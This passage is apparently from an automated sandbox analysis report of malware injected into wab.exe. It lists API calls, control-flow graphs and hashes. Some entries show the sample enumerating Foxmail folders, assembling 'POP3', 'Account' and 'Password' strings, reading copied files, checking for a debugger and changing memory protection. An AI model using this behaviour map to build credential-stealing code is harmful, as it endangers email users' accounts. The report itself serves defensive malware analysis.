2366482c 7106->7109 7107 23662ada _ValidateLocalCookies 5 API calls 7108 23664811 7107->7108 7108->7099 7109->7107

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23661137
                                                  • lstrcatW.KERNEL32(?,?), ref: 23661151
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2366115C
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2366116D
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2366117C
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23661193
                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 236611D0
                                                  • FindClose.KERNEL32(00000000), ref: 236611DB
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                  • String ID:
                                                  • API String ID: 1083526818-0
                                                  • Opcode ID: ee04c035d8403f11e519abf3e60dbb4f67893ab76e97a43ac3bbdcbb81e28fe9
                                                  • Instruction ID: 849f9cfcc8a8ee8d9b3adc483d38d7680fe5fa17e71ee8aa21cfc118c93ebf23
                                                  • Opcode Fuzzy Hash: ee04c035d8403f11e519abf3e60dbb4f67893ab76e97a43ac3bbdcbb81e28fe9
                                                  • Instruction Fuzzy Hash: 7621A5719043486BD720EF659C48F9B7BDCEF94394F14092AF958D3190EB38D6058BD6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 54 503f94b-503f980 55 503f982-503f990 call 503f21f 54->55 57 503f992-503f99b 55->57 58 503f99d-503f9a8 55->58 57->58 59 503f9b5-503f9f8 NtProtectVirtualMemory call 503f21f 58->59 60 503f9aa-503f9b3 Sleep 58->60 63 503f9fd-503fa08 59->63 60->54 63->54
                                                  APIs
                                                  • Sleep.KERNEL32(00000005), ref: 0503F9AE
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 0503F9F5
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3253006379.0000000004766000.00000040.00000400.00020000.00000000.sdmp, Offset: 04766000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4766000_wab.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectSleepVirtual
                                                  • String ID:
                                                  • API String ID: 3235210055-0
                                                  • Opcode ID: 0f4daaf85a97749bf7e56b1adb38cfe809d1ef3df5ed2b999977a34646cc740a
                                                  • Instruction ID: 68ae388061909bf710155c624db5a9bf1f755faef8d39d82e68d506c0365383d
                                                  • Opcode Fuzzy Hash: 0f4daaf85a97749bf7e56b1adb38cfe809d1ef3df5ed2b999977a34646cc740a
                                                  • Instruction Fuzzy Hash: 7D112B70511302EFE7409F34D94EB8E77AAAF11360F524148DD214B0B2E76CC989CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23661434
                                                    • Part of subcall function 236610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23661137
                                                    • Part of subcall function 236610F1: lstrcatW.KERNEL32(?,?), ref: 23661151
                                                    • Part of subcall function 236610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2366115C
                                                    • Part of subcall function 236610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2366116D
                                                    • Part of subcall function 236610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2366117C
                                                    • Part of subcall function 236610F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23661193
                                                    • Part of subcall function 236610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 236611D0
                                                    • Part of subcall function 236610F1: FindClose.KERNEL32(00000000), ref: 236611DB
                                                  • lstrlenW.KERNEL32(?), ref: 236614C5
                                                  • lstrlenW.KERNEL32(?), ref: 236614E0
                                                  • lstrlenW.KERNEL32(?,?), ref: 2366150F
                                                  • lstrcatW.KERNEL32(00000000), ref: 23661521
                                                  • lstrlenW.KERNEL32(?,?), ref: 23661547
                                                  • lstrcatW.KERNEL32(00000000), ref: 23661553
                                                  • lstrlenW.KERNEL32(?,?), ref: 23661579
                                                  • lstrcatW.KERNEL32(00000000), ref: 23661585
                                                  • lstrlenW.KERNEL32(?,?), ref: 236615AB
                                                  • lstrcatW.KERNEL32(00000000), ref: 236615B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                  • String ID: )$Foxmail$ProgramFiles
                                                  • API String ID: 672098462-2938083778
                                                  • Opcode ID: 843a0efda08e0e114533e12f1f580297ab4a289f62de3ba160ce4f6eb717f3bd
                                                  • Instruction ID: e5d3d6dc31e86c8fef02d106bb24fdbcf5bac574620b7873b6258adc7a136cd8
                                                  • Opcode Fuzzy Hash: 843a0efda08e0e114533e12f1f580297ab4a289f62de3ba160ce4f6eb717f3bd
                                                  • Instruction Fuzzy Hash: 7A81AE75A00358AADB30DBA19C85FEE737DEF84740F0005DAFA08E7190EA755A85CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 236661DA
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 236661E4
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 236661F1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 8af7c02ded71e4b5cd7ca57879bd70a7234a3855b6f284a5af2bc74b7ef7b7fd
                                                  • Instruction ID: dbf5cf4aff4a835dd50bcd710a0509b7aabdbd53e28308cc1826e885b683635f
                                                  • Opcode Fuzzy Hash: 8af7c02ded71e4b5cd7ca57879bd70a7234a3855b6f284a5af2bc74b7ef7b7fd
                                                  • Instruction Fuzzy Hash: 1531D47491122C9BCB21DF24D988BDDBBB8BF18350F5041DAE81CA7250EB789B858F49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,23664A8A,?,23672238,0000000C,23664BBD,00000000,00000000,00000001,23662082,23672108,0000000C,23661F3A,?), ref: 23664AD5
                                                  • TerminateProcess.KERNEL32(00000000,?,23664A8A,?,23672238,0000000C,23664BBD,00000000,00000000,00000001,23662082,23672108,0000000C,23661F3A,?), ref: 23664ADC
                                                  • ExitProcess.KERNEL32 ref: 23664AEE
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: fcabd88eaddadc7488eea2a93a81cdfbe70a64059b309be7fddc18b10268ef33
                                                  • Instruction ID: 13817da1de0defc47595279a163da56336c39dbf6d753bc0273185cf5df7560e
                                                  • Opcode Fuzzy Hash: fcabd88eaddadc7488eea2a93a81cdfbe70a64059b309be7fddc18b10268ef33
                                                  • Instruction Fuzzy Hash: AFE04636100A88AFCF027F26CE48A993B2DEF103C1B204054FA048B429CB3DDD82DE48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: bff6f626b27e8bdec47cff6b684e198e3607f9d4dd90afc822dacc4ea6585c36
                                                  • Instruction ID: 72c218eb93c63479c746649151d73342dfa0f37df5fea53f11c2d38a4e3bde74
                                                  • Opcode Fuzzy Hash: bff6f626b27e8bdec47cff6b684e198e3607f9d4dd90afc822dacc4ea6585c36
                                                  • Instruction Fuzzy Hash: BEA011302002028F8308AE32830A22C3AACAAA82C0338002AA808C0008FB3CC0028A0A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterSection
                                                  • String ID:
                                                  • API String ID: 1904992153-0
                                                  • Opcode ID: 3de3b9f376b88bea6d86fd0c24b37ba71acb5a36330cafff44557ea08ecfe008
                                                  • Instruction ID: 2a7fa1a222008650a285c6911728247636d802a93e61dda75c2af79f9885d9a4
                                                  • Opcode Fuzzy Hash: 3de3b9f376b88bea6d86fd0c24b37ba71acb5a36330cafff44557ea08ecfe008
                                                  • Instruction Fuzzy Hash: 8D215E31D103099BCB10EB78C580AAD77BDAB747E4F248289E624B6291C73DA941CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 23661CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D1B
                                                    • Part of subcall function 23661CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23661D37
                                                    • Part of subcall function 23661CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D4B
                                                  • _strlen.LIBCMT ref: 23661855
                                                  • _strlen.LIBCMT ref: 23661869
                                                  • _strlen.LIBCMT ref: 2366188B
                                                  • _strlen.LIBCMT ref: 236618AE
                                                  • _strlen.LIBCMT ref: 236618C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strlen$File$CopyCreateDelete
                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                  • API String ID: 3296212668-3023110444
                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                  • Instruction ID: a88c17e418ae756a27ee7954142b2c69c30cc9c4a34fae6b6d019e67dd11dad3
                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                  • Instruction Fuzzy Hash: 5E610471D00318AFEF219BA4C940BDEB7BDAF16280F0445DAD205A7251DB7C5A47CF9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                  • API String ID: 4218353326-230879103
                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                  • Instruction ID: acb0f0b627fa9b80bed173bd9f6bf9964269ea33eb26129ca9a3d1b298254610
                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                  • Instruction Fuzzy Hash: 707106B1D002685BDB229BB48D84ADF7BFC9F16280F1440DAD644D7241E67C9786CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 213 23667cc2-23667cd6 214 23667d44-23667d4c 213->214 215 23667cd8-23667cdd 213->215 217 23667d93-23667dab call 23667e35 214->217 218 23667d4e-23667d51 214->218 215->214 216 23667cdf-23667ce4 215->216 216->214 219 23667ce6-23667ce9 216->219 227 23667dae-23667db5 217->227 218->217 221 23667d53-23667d90 call 2366571e * 4 218->221 219->214 222 23667ceb-23667cf3 219->222 221->217 225 23667cf5-23667cf8 222->225 226 23667d0d-23667d15 222->226 225->226 229 23667cfa-23667d0c call 2366571e call 236690ba 225->229 232 23667d17-23667d1a 226->232 233 23667d2f-23667d43 call 2366571e * 2 226->233 230 23667db7-23667dbb 227->230 231 23667dd4-23667dd8 227->231 229->226 241 23667dd1 230->241 242 23667dbd-23667dc0 230->242 237 23667df0-23667dfc 231->237 238 23667dda-23667ddf 231->238 232->233 235 23667d1c-23667d2e call 2366571e call 236691b8 232->235 233->214 235->233 237->227 248 23667dfe-23667e0b call 2366571e 237->248 245 23667de1-23667de4 238->245 246 23667ded 238->246 241->231 242->241 250 23667dc2-23667dd0 call 2366571e * 2 242->250 245->246 253 23667de6-23667dec call 2366571e 245->253 246->237 250->241 253->246
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 23667D06
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 236690D7
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 236690E9
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 236690FB
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 2366910D
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 2366911F
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 23669131
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 23669143
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 23669155
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 23669167
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 23669179
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 2366918B
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 2366919D
                                                    • Part of subcall function 236690BA: _free.LIBCMT ref: 236691AF
                                                  • _free.LIBCMT ref: 23667CFB
                                                    • Part of subcall function 2366571E: HeapFree.KERNEL32(00000000,00000000,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?), ref: 23665734
                                                    • Part of subcall function 2366571E: GetLastError.KERNEL32(?,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?,?), ref: 23665746
                                                  • _free.LIBCMT ref: 23667D1D
                                                  • _free.LIBCMT ref: 23667D32
                                                  • _free.LIBCMT ref: 23667D3D
                                                  • _free.LIBCMT ref: 23667D5F
                                                  • _free.LIBCMT ref: 23667D72
                                                  • _free.LIBCMT ref: 23667D80
                                                  • _free.LIBCMT ref: 23667D8B
                                                  • _free.LIBCMT ref: 23667DC3
                                                  • _free.LIBCMT ref: 23667DCA
                                                  • _free.LIBCMT ref: 23667DE7
                                                  • _free.LIBCMT ref: 23667DFF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 938248585fe6ccbc2deab5a5271b69f2e6e3a4b451b5ecc20498aa9bab75e172
                                                  • Instruction ID: 4d4addd24111af553ba7be7355299099881cb4ca7f83992302adfff1d9540980
                                                  • Opcode Fuzzy Hash: 938248585fe6ccbc2deab5a5271b69f2e6e3a4b451b5ecc20498aa9bab75e172
                                                  • Instruction Fuzzy Hash: 94315031500309DFDB31AF38DA45B66BBEDEF00290F284899EA59D7552DE39E980CF18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • _free.LIBCMT ref: 236659EA
                                                    • Part of subcall function 2366571E: HeapFree.KERNEL32(00000000,00000000,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?), ref: 23665734
                                                    • Part of subcall function 2366571E: GetLastError.KERNEL32(?,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?,?), ref: 23665746
                                                  • _free.LIBCMT ref: 236659F6
                                                  • _free.LIBCMT ref: 23665A01
                                                  • _free.LIBCMT ref: 23665A0C
                                                  • _free.LIBCMT ref: 23665A17
                                                  • _free.LIBCMT ref: 23665A22
                                                  • _free.LIBCMT ref: 23665A2D
                                                  • _free.LIBCMT ref: 23665A38
                                                  • _free.LIBCMT ref: 23665A43
                                                  • _free.LIBCMT ref: 23665A51
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 80ff24490757ba31cfdc5f6c01d299d9382dfba18b8b6da3ddc96bb4ffbc0ea3
                                                  • Instruction ID: 10d298d5534537a033aecf2bf73f18b22049d86d20e7d6fa746c14609300db4e
                                                  • Opcode Fuzzy Hash: 80ff24490757ba31cfdc5f6c01d299d9382dfba18b8b6da3ddc96bb4ffbc0ea3
                                                  • Instruction Fuzzy Hash: E611A47A52024DEFCB21DF54C856CDD3FA9EF14290B0941E5BB088B621DA35DA509F84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D1B
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23661D37
                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D4B
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D58
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D72
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D7D
                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23661D8A
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 1454806937-0
                                                  • Opcode ID: 06cdd80da6282cf03394811382c7a8ea1197958c72a88cd5c1b0e2051f7155e3
                                                  • Instruction ID: 97ebf39c9c111064042dafac396e5ef23573430804c54792b1b540b77eeb1a0f
                                                  • Opcode Fuzzy Hash: 06cdd80da6282cf03394811382c7a8ea1197958c72a88cd5c1b0e2051f7155e3
                                                  • Instruction Fuzzy Hash: AC213CB1D4121CBFDB11AFA18C8CEEB76ACEB28398F1409A6F511D2144D67C9E468F74
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 314 23669492-236694ef GetConsoleCP 315 236694f5-23669511 314->315 316 23669632-23669644 call 23662ada 314->316 317 23669513-2366952a 315->317 318 2366952c-2366953d call 23667c19 315->318 321 23669566-23669575 call 236679e6 317->321 326 23669563-23669565 318->326 327 2366953f-23669542 318->327 321->316 328 2366957b-2366959b WideCharToMultiByte 321->328 326->321 329 23669548-2366955a call 236679e6 327->329 330 23669609-23669628 327->330 328->316 331 236695a1-236695b7 WriteFile 328->331 329->316 337 23669560-23669561 329->337 330->316 333 2366962a-23669630 GetLastError 331->333 334 236695b9-236695ca 331->334 333->316 334->316 336 236695cc-236695d0 334->336 338 236695d2-236695f0 WriteFile 336->338 339 236695fe-23669601 336->339 337->328 338->333 340 236695f2-236695f6 338->340 339->315 341 23669607 339->341 340->316 342 236695f8-236695fb 340->342 341->316 342->339
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23669C07,?,00000000,?,00000000,00000000), ref: 236694D4
                                                  • __fassign.LIBCMT ref: 2366954F
                                                  • __fassign.LIBCMT ref: 2366956A
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 23669590
                                                  • WriteFile.KERNEL32(?,?,00000000,23669C07,00000000,?,?,?,?,?,?,?,?,?,23669C07,?), ref: 236695AF
                                                  • WriteFile.KERNEL32(?,?,00000001,23669C07,00000000,?,?,?,?,?,?,?,?,?,23669C07,?), ref: 236695E8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: b12d263ddd187606d375ebdfee3bf73fec624eca4005d01a782ec592a83d8d39
                                                  • Instruction ID: 731e508c592da73e45e78e6b26e5bffbe72bfff25d26f29b27480538cbbe71c9
                                                  • Opcode Fuzzy Hash: b12d263ddd187606d375ebdfee3bf73fec624eca4005d01a782ec592a83d8d39
                                                  • Instruction Fuzzy Hash: F451C5719002099FDB14CFA8C891BEEBBFCEF19350F14415AE951E7281E7789951CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 343 23663370-236633b5 call 23663330 call 236637a7 348 23663416-23663419 343->348 349 236633b7-236633c9 343->349 350 2366341b-23663428 call 23663790 348->350 351 23663439-23663442 348->351 349->351 352 236633cb 349->352 355 2366342d-23663436 call 23663330 350->355 354 236633d0-236633e7 352->354 356 236633fd 354->356 357 236633e9-236633f7 call 23663740 354->357 355->351 358 23663400-23663405 356->358 365 2366340d-23663414 357->365 366 236633f9 357->366 358->354 361 23663407-23663409 358->361 361->351 364 2366340b 361->364 364->355 365->355 367 23663443-2366344c 366->367 368 236633fb 366->368 369 23663486-23663496 call 23663774 367->369 370 2366344e-23663455 367->370 368->358 376 236634aa-236634c6 call 23663330 call 23663758 369->376 377 23663498-236634a7 call 23663790 369->377 370->369 372 23663457-23663466 call 2366bbe0 370->372 378 23663483 372->378 379 23663468-23663480 372->379 377->376 378->369 379->378
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 2366339B
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 236633A3
                                                  • _ValidateLocalCookies.LIBCMT ref: 23663431
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 2366345C
                                                  • _ValidateLocalCookies.LIBCMT ref: 236634B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 34da8267a16cf9d3067bb5e1b3ad0473f2f8fce94111514d2375f6d34010102c
                                                  • Instruction ID: 5ddefddc2684da998994cf693619fd223449393273e1022d7f85b44d852cd3b6
                                                  • Opcode Fuzzy Hash: 34da8267a16cf9d3067bb5e1b3ad0473f2f8fce94111514d2375f6d34010102c
                                                  • Instruction Fuzzy Hash: 7741D834A002489BCB10DF69C844A9EBFBDAF552A4F2C81D5D934AB261D739DA01CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 23669221: _free.LIBCMT ref: 2366924A
                                                  • _free.LIBCMT ref: 236692AB
                                                    • Part of subcall function 2366571E: HeapFree.KERNEL32(00000000,00000000,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?), ref: 23665734
                                                    • Part of subcall function 2366571E: GetLastError.KERNEL32(?,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?,?), ref: 23665746
                                                  • _free.LIBCMT ref: 236692B6
                                                  • _free.LIBCMT ref: 236692C1
                                                  • _free.LIBCMT ref: 23669315
                                                  • _free.LIBCMT ref: 23669320
                                                  • _free.LIBCMT ref: 2366932B
                                                  • _free.LIBCMT ref: 23669336
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
